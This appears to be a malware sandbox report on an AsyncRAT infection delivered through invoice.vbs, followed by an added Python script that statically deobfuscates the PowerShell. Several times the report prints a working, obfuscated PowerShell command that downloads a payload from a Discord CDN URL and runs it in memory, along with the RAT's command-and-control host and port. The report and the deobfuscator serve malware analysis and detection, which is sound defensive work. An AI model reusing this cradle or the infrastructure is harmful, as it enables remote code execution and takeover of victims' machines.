{"Server": "ahmed2611.linkpc.net", "Port": "6666", "Version": "0.5.7B", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "false", "Group": "Default"}
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\invoice.vbs', ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5616, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, ProcessId: 6080 |
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\invoice.vbs', ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5616, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, ProcessId: 6080 |
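Added example, not part of the Joe Sandbox report: a static deobfuscator for the PowerShell command line recorded in the Sigma rows above. The wscript.exe child builds its real command from junk-token string literals, a chain of .Replace() calls and backtick-escaped letters, then hands the result to Invoke-Expression twice (once on the assembled text, once on what the download returns). The script below evaluates the Replace chains and backtick escapes the way Windows PowerShell 5.1 reads them (ordinal, case-sensitive Replace; a backtick before a letter that is not one of 5.1's escape letters yields the letter itself, which is why `e can be used as a plain e in this sample) without executing any PowerShell, and recovers the download cradle and its URL. The command line is copied verbatim from the report; the regexes and the PS51_ESCAPES table are this example's own assumptions, not a general PowerShell parser.

```python
"""Static deobfuscation of the Replace()/backtick PowerShell cradle above."""
from __future__ import annotations

import re

# Command line copied from the "Process started" rows of the report above.
CMDLINE = (
    "$TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';"
    "$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');"
    "$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');"
    "$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'"
    ".Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');"
    "&('I'+'EX')($A -Join '')|&('I'+'EX');"
)

# $NAME = 'literal' followed by zero or more .Replace('old','new') calls.
# Assumption of this example: single-quoted literals without embedded quotes.
ASSIGN_RE = re.compile(
    r"\$(?P<name>\w+)\s*=\s*'(?P<lit>[^']*)'"
    r"(?P<chain>(?:\.Replace\('[^']*','[^']*'\))*)"
)
REPLACE_RE = re.compile(r"\.Replace\('([^']*)','([^']*)'\)")

# Backtick escapes Windows PowerShell 5.1 recognises (`e only became an escape
# in PowerShell 6). Any other escaped character is read as itself, so I`EX is
# tokenised as IEX and n`e`W`-Obj`E`c`T as neW-ObjEcT.
PS51_ESCAPES = {"0": "\0", "a": "\a", "b": "\b", "f": "\f",
                "n": "\n", "r": "\r", "t": "\t", "v": "\v"}


def resolve_assignments(cmd: str) -> dict[str, str]:
    """Evaluate every $var = 'literal'.Replace(...) chain left to right.
    .NET String.Replace(string, string) is ordinal and case-sensitive, which is
    exactly Python's str.replace, so no PowerShell needs to run."""
    env: dict[str, str] = {}
    for m in ASSIGN_RE.finditer(cmd):
        value = m.group("lit")
        for old, new in REPLACE_RE.findall(m.group("chain")):
            value = value.replace(old, new)
        env[m.group("name")] = value
    return env


def unescape_backticks(code: str) -> str:
    """Apply backtick escapes as the 5.1 tokenizer does outside string literals."""
    return re.sub(r"`(.)", lambda m: PS51_ESCAPES.get(m.group(1), m.group(1)), code)


def substitute_vars(code: str, env: dict[str, str]) -> str:
    """Inline known variables; a value that is not a bare identifier/type name
    (the URL) is shown quoted so the result reads as the literal it carries."""
    def repl(m: re.Match) -> str:
        name = m.group(1)
        if name not in env:
            return m.group(0)
        val = env[name]
        return val if re.fullmatch(r"[\w.\-]+", val) else f"'{val}'"
    return re.sub(r"\$(\w+)", repl, code)


def deobfuscate(cmd: str) -> str:
    """Return the text the first &('I'+'EX') actually evaluates.
    -Join '' on a single string is a no-op, so that text is $A with backtick
    escapes resolved; the second IEX then runs whatever was downloaded."""
    env = resolve_assignments(cmd)
    return substitute_vars(unescape_backticks(env["A"]), env)


def extract_urls(cmd: str) -> list[str]:
    """Network IOCs: every resolved variable that is an http(s) URL."""
    env = resolve_assignments(cmd)
    return sorted(v for v in env.values() if v.lower().startswith(("http://", "https://")))


def is_download_cradle(script: str) -> bool:
    """Detection check on the deobfuscated text: Invoke-Expression wrapped
    around WebClient.DownloadString() is the classic in-memory cradle."""
    s = script.lower()
    return (s.startswith(("iex", "invoke-expression"))
            and "net.webclient" in s and ".downloadstring(" in s)


if __name__ == "__main__":
    for name, value in resolve_assignments(CMDLINE).items():
        print(f"${name} = {value!r}")
    plain = deobfuscate(CMDLINE)
    print("stage 1:", plain)
    print("cradle :", is_download_cradle(plain), "urls:", extract_urls(CMDLINE))
```

The recovered first stage is `IEX(neW-ObjEcT nEt.WEbClIeNT).DOWnLoaDSTrInG('https://cdn.discordapp.com/.../dola2021.txt')`, which matches the transcript file and the dola2020.txt/dola2021.txt strings found in powershell.exe memory further down; case-folding before matching is what lets a detection keyed on `new-object net.webclient` and `downloadstring` survive the mixed-case output.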
Source: 0000000B.00000002.728657057.0000000003451000.00000004.00000001.sdmp | Malware Configuration Extractor: AsyncRAT {"Server": "ahmed2611.linkpc.net", "Port": "6666", "Version": "0.5.7B", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "false", "Group": "Default"} |
Source: 11.2.aspnet_compiler.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen |
Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49722 version: TLS 1.0 |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.282275640.0000019FCDDE0000.00000004.00000001.sdmp |
Source: | Binary string: Console.pdb source: powershell.exe, 00000003.00000002.264815805.0000019FB5840000.00000004.00000001.sdmp |
Source: Malware configuration extractor | URLs: ahmed2611.linkpc.net |
Source: Joe Sandbox View | IP Address: 162.159.130.233 162.159.130.233 |
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad |
Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com |
Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0 |
Source: powershell.exe, 00000003.00000002.264636885.0000019FB5709000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000003.00000002.282168154.0000019FCDD54000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsof |
Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07 |
Source: powershell.exe, 00000003.00000002.282233519.0000019FCDD9D000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m |
Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0 |
Source: powershell.exe, 00000003.00000002.264765066.0000019FB57BC000.00000004.00000001.sdmp | String found in binary or memory: http://csoft.com/pki/crls/MicRooCerAut_2 |
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0 |
Source: powershell.exe, 00000003.00000002.282233519.0000019FCDD9D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0: |
Source: powershell.exe, 00000003.00000002.266551043.0000019FB5AE8000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000003.00000002.264881794.0000019FB58D1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000003.00000002.266551043.0000019FB5AE8000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com/CPS0v |
Source: powershell.exe, 00000003.00000002.276154584.0000019FB6AB4000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp, Run.vbs.3.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/833416270924742669/869658269294137374/dola2020.txt |
Source: PowerShell_transcript.019635.jcVtHXYn.20210803225606.txt.3.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt |
Source: powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.comx |
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.266551043.0000019FB5AE8000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000003.216141533.0000019FB73B7000.00000004.00000001.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct |
Source: powershell.exe, 00000003.00000002.282233519.0000019FCDD9D000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722 |
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729 |
Source: Yara match | File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.2.powershell.exe.19fb5fc3208.8.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.2.powershell.exe.19fb67b2de0.7.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.2.powershell.exe.19fb67b2de0.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.2.powershell.exe.19fb5fc3208.8.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000003.00000002.275049815.0000019FB696D000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.268623513.0000019FB5FBA000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000B.00000002.726757646.0000000000402000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6080, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 4652, type: MEMORYSTR |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX'); | |
Source: invoice.vbs | Initial sample: Strings found which are bigger than 50 |
Source: 00000001.00000002.201434500.000002777ABB5000.00000004.00000020.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000001.00000002.202016822.000002777C910000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000001.00000003.200969823.000002777ACDB000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000001.00000002.201502033.000002777ACD5000.00000004.00000040.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, Client/Settings.cs | Base64 encoded string: 'ORdYcE2bXV2gT5LE+OfaBw4GVYJTZchCidays17N8AovrdbZ+BIY02eeWM/ZrZuIWeeoP3SNu3MxKfBl/chWCg==', 'K2jnte1s8mMGsqg1iyvtWcyE57N9FRlHYaWky/fyNnisF1RH2N5qkcCEW/aD/nVN0i1lAOa9FV4BujuylbBKF15pxmJ9edqiYK2dZDncBGQ=', 'y8viL2WZX9NPEiJvWsyHTqBhftlTaTEuiIqYxhtCkgzY/z6wRBw0QgN2AsmcYh8tmbm+A1WwS/YcodRWP1fPcDl3vlKEZPdPtnzhm2wIUAQ=', … |